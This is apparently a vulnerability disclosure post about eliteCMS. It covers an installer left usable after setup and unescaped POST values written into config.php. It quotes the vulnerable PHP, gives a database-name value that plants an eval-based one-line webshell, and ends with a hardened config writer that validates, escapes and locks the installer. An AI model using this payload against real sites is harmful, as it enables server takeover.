eliteCMS installer not locked after setup + one-line webshell write vulnerability

Posted on 2012-11-18 13:59:27
The eliteCMS installer is not locked after installation completes, so a hacker can re-run the installation simply by visiting the installer's URL.

The other vulnerability is that the installer can write a one-line webshell straight into admin/includes/config.php.

Let's look at the code:
...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
...omitted...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // The session values below come straight from POST and are interpolated
    // into the generated PHP source without any escaping
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');
...

Now look at this code:
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
The values are taken without any validation.

If the database name POST field is set to:

"?><?php eval($_POST[c]);?><?php

a one-line backdoor will be written to /admin/includes/config.php.
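A hardened version of the same config-writing step, added here as an example and not eliteCMS's own code; the function names, the allow-list patterns and the install.lock path are assumptions. Each value is checked against an allow-list and emitted with var_export(), so it can never close the string literal or the PHP block, and the step refuses to run once the lock file exists.

```php
<?php
// Added example (not eliteCMS code). Function names, allow-list patterns and
// the install.lock path are assumptions for illustration.

// Allow only the characters a host, database name, user name or password needs.
function validate_db_setting(string $key, string $value): string {
    $patterns = [
        'DB_SERVER' => '/^[A-Za-z0-9.\-]{1,253}(:\d{1,5})?$/',
        'DB_NAME'   => '/^[A-Za-z0-9_]{1,64}$/',
        'DB_USER'   => '/^[A-Za-z0-9_.\-]{1,32}$/',
        'DB_PASS'   => '/^[^\x00-\x1f]{0,128}$/',   // any printable chars
    ];
    if (!isset($patterns[$key]) || !preg_match($patterns[$key], $value)) {
        throw new InvalidArgumentException("Rejected value for $key");
    }
    return $value;
}

// Build config.php from validated values. var_export() writes each value as an
// escaped single-quoted PHP literal, so "?>" or a quote inside it stays data.
function build_config(array $settings): string {
    $out = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $value = validate_db_setting($key, (string)($settings[$key] ?? ''));
        $out .= 'define(' . var_export($key, true) . ', '
              . var_export($value, true) . ");\n";
    }
    return $out;
}

// Refuse to run the installer step again once install.lock exists, and create
// the lock right after a successful write so the step cannot be replayed.
function write_config(string $file, string $lock, array $settings): void {
    if (file_exists($lock)) {
        throw new RuntimeException('Installer is locked: ' . basename($lock) . ' exists');
    }
    $content = build_config($settings);          // validates before any write
    if (file_put_contents($file, $content, LOCK_EX) === false) {
        throw new RuntimeException("Cannot write $file");
    }
    file_put_contents($lock, date('c'), LOCK_EX);
}

// Constructed sample call; a real installer would pass $_POST instead.
$dir = __DIR__ . '/admin/includes';
write_config("$dir/config.php", "$dir/install.lock",
    ['DB_SERVER' => 'localhost', 'DB_NAME' => 'elitecms',
     'DB_USER' => 'elite', 'DB_PASS' => 'example-password']);
```

A second run with the same arguments throws before touching config.php, and a DB_NAME containing `"?><?php` is rejected by the allow-list before it is ever interpolated.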